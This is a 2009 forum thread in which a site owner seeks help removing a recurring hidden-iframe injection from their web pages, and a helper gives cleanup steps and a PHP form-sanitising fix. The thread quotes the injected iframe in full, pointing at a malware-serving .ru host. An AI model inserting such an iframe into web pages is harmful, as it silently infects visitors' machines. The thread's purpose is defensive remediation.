Malware Domain List
Malware Related => Compromised Servers => Topic started by: #41baby on July 12, 2009, 02:10:49 pm
-
Hello,
I have been having problems with several websites I design/maintain. We thought the issue was dealt with 3 months ago but it keeps coming back. The following appears in any page named INDEX:
<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
It causes a virus to be downloaded.
I have done everything the internet has suggested: malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday). I woke up this morning and the sites were again nailed with the virus.
I read on this list, it could have something to do with PHP code. Could it be my form code? I have one PHP and one that is flash with PHP that I got off the net.
If anyone here can help me out, that would be greatly appreciated.
After I get my password change (and I removed the FTP program's storage of the information), what should I do?
Thanks,
DN
MysteryFCM: Embedded HTML in BBCode tags
-
Theres 4 main things you need to do;
1. Check your sites files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site
This should ALL be done from a known clean machine (i.e. not the machine you usually use).
If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.
If your site uses a database, this will need to be checked aswell.
-
Hello,
Thanks for the reply.
Questions from your answers:
1. Check your sites files (ALL of the files) for malicious code: the code keeps appearing and re-appearing. What I usually do is delete it from the server and upload the one from my computer which does not have it. Then, after 2 months (or in this case a couple days lately), it reappears. They only seem to attach the INDEX.HTML pages.
2. Check no shells were uploaded: I have no idea what you mean by this. Can you tell me how to check for "shells".
3. Change the FTP passwords: In the works.
4. Change any web based passwords for the site: I do have any.
5. This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups: This is always the part I get really confused. The website files from my computer are always clean. They get infected once I put them online. I have checked them many times and they are clean. So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?
6. If your site uses a database: I just have a basic package from www.namesecure.com. Not sure if it has a database. I do not think so.
Thanks for your answers and I look forward to clarifying what you already said.
DN
-
These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.
-
Hello,
These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.
Two (more) Questions:
1 - Any suggestions for checking my computer. I have done SEVERAL different scans and methods. Any suggestions would be appreciated. Perhaps I missed something.
2 - In terms of using another computer to upload: so I can never use my actually computer again? What if I need to change something on my website? My lap-top does not have the programs.
Thanks,
DN
-
Shells allow the attacker to compromise the site, even after the passwords are changed, as they can then do whatever they want via an HTTP interface. You can identify these by going through the files on the server, and deleting any that shouldn't be there (you can identify what shouldn't be there by checking your backups)
You can use your usual machine again, once you're sure it's clean. Without knowing which programs you've already tried, I can only suggest programs to use;
a-Squared
www.emsisoft.com
Malwarebytes AntiMalware
www.malwarebytes.org
ClamWin
www.clamwin.com
Kaspersky
www.kaspersky.com
the code keeps appearing and re-appearing. What I usually do is delete it from the server and upload the one from my computer which does not have it. Then, after 2 months (or in this case a couple days lately), it reappears. They only seem to attach the INDEX.HTML pages.
If you've not changed the FTP password yet, it won't matter how many times you replace the files, especially if this is how they got in - it will keep happening until the FTP password is changed (this should've been the first thing to have been done)
-
As an aside, if you would like help verifying your machine is clean, please see the following;
http://temerc.com/forums/viewtopic.php?f=12&t=18
-
Hello,
Thanks.
I will get my changed passwords hopefully on Monday.
I will then go through everything you have suggested.
I appreciate the help and will post again if it comes up again.
DN
-
No problem ..... if you require further help, please do not hesitate to pop back :)
-
Hello,
I do have one more question. I have noticed during my investigations on these viruses that it could be the PHP code of forms. I have also noticed that one "under construction" site I have, the virus acted different. That site got nailed with the virus but does NOT have the PHP form code, the virus is there in the code but does not activate.
Below is the code for my FLASH/PHP form.
I was wondering if there might be something that could be improved.
Thanks,
DN
---
<?php
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];
if( $contact_name == true )
{
$sender = $contact_email;
$receiver = "MY EMAIL ADDRESS";
$client_ip = $_SERVER['REMOTE_ADDR'];
$email_body = "Name: $contact_name \nEmail: $sender \nSubject: $contact_subject \nMessage: $contact_message \nIP: $client_ip";
$extra = "From: $sender\r\n" . "Reply-To: $sender \r\n" . "X-Mailer: PHP/" . phpversion();
if( mail( $receiver, "Flash Contact Form - $subject", $email_body, $extra ) )
{
echo "success=yes";
}
else
{
echo "success=no";
}
}
?>
MysteryFCM: Embedded code in BBCode tags
-
Change;
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];
if( $contact_name == true )
To;
$contact_name = $_POST['name']; $contact_name=stripslashes(htmlspecialchars($contact_name, ENT_QUOTES));
$contact_email = $_POST['email']; if(strpos($contact_email, "@")==false){die('E-mail invalid');}
$contact_email = stripslashes(htmlspecialchars($contact_email, ENT_QUOTES));
$contact_subject = $_POST['subject']; $contact_subject=stripslashes(htmlspecialchars($contact_subject, ENT_QUOTES));
$contact_message = $_POST['message']; $contact_message=stripslashes(htmlspecialchars($contact_message, ENT_QUOTES));
if(isset($_POST['email']) && isset($_POST['message']))
-
I also wrote a spambot filter that you may want to consider adding to your forms;
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool
There's a vanilla PHP mod at;
http://forum.hosts-file.net/viewtopic.php?f=69&t=1597
-
Hello,
I cannot express how much I appreciate this.
Should I change it and upload AFTER the new passwords are in place?
I was thinking, I could delete the entire website and upload my backups after I do a double check of my computer. I know none of web pages on my computer are effected. Still, the virus could be on my computer. I will get it checked using ALL the methods you mentioned above.
Thanks,
DN
-
If you've got a backup, even better. This will save you having to identify shells and manually remove malicious code. However, this should only be done AFTER;
1. FTP passwords are changed
2. Your machine is confirmed as clean (unless of course, you do this from a secondary machine known to be clean)
3. ALL files currently on your sites FTP server are deleted
Again, I must stress, if this is done before the passwords are changed and before the machine is confirmed as clean, there is nothing preventing this happening again.
-
Hello,
I checked my website's server and I do not see any files I do not recognize. Every file that is on the server, that is on my computer is clean.
I will follow your instructions to the letter.
Thank you,
Derek
-
No problem ... :)
-
Hello,
I also read you can do something with the .HTACCESS file?
Is this true?
I deleted the entire websites that were affected and will be running ALL the scans you suggested tonight.
Once I get the OK from that site you suggested (that my computer is ok), I will re-load the sites with the new passwords.
Derek
MyseryFCM - I send you a private email question (sorry, meant to post here).
-
I also read you can do something with the .HTACCESS file?
Is this true?
This is indeed true, yes. This file has been known to be modified to redirect to malicious sites, so should also be replaced with a backup if possible.
MyseryFCM - I send you a private email question (sorry, meant to post here).
No problem :)
-
Hello,
By the way, I checked my serve and I do not have a .HTACCESS file.
Is this a problem?
DN
-
That's not a problem at all :)
You can create one however;
http://www.freewebmasterhelp.com/tutorials/htaccess/
-
Hello,
Ok, my Hijack This log was checked and clean.
They also made me do three other scans, all of which were clean.
I am not sure I understand the tutorials for the htaccess.
Do I need one for it to work?
Thanks,
DN
-
You don't need a .htaccess, no. It is generally recommended however.
Now your machine has the all clear, you can delete the files on the server, and replace them with the clean backups :) (assuming your FTP password has been changed now?)
-
Hello,
Before I started the malware check on my computer, I went on all three servers that I deal with and deleted the files.
I checked my files on my computer and they are clean.
The company I deal with changes the passwords and emails to me so I should get them today.
I have done everthing you suggestion.
I hope this ends the problem.
Thanks,
Derek
-
My pleasure :)
-
Hello,
I see this line in one my pages:
<!-- saved from url=(0022)http://internet.e-mail -->
Does it mean anything?
DN
-
That means the page was saved from somewhere else.
Is the file one of yours? (can you post a copy of it? (zipped please))
-
Hello,
They are the files from my computer.
They appear to be on all my files.
Thanks,
DN
-
Where the files obtained from? (i.e. did you use a crawler or such, to backup an online copy of your site).
My reason for asking is that the line in question, is only ever seen, when a downloader of some description, has been used to create an offline copy of a website. It is highly unusual for files to contain this otherwise.
-
Hello,
I have no idea. I create the site on my computer and upload it to the server. I never had a back-up.
What should I do with that line?
Can I delete it?
DN
-
You can delete that line, yes :)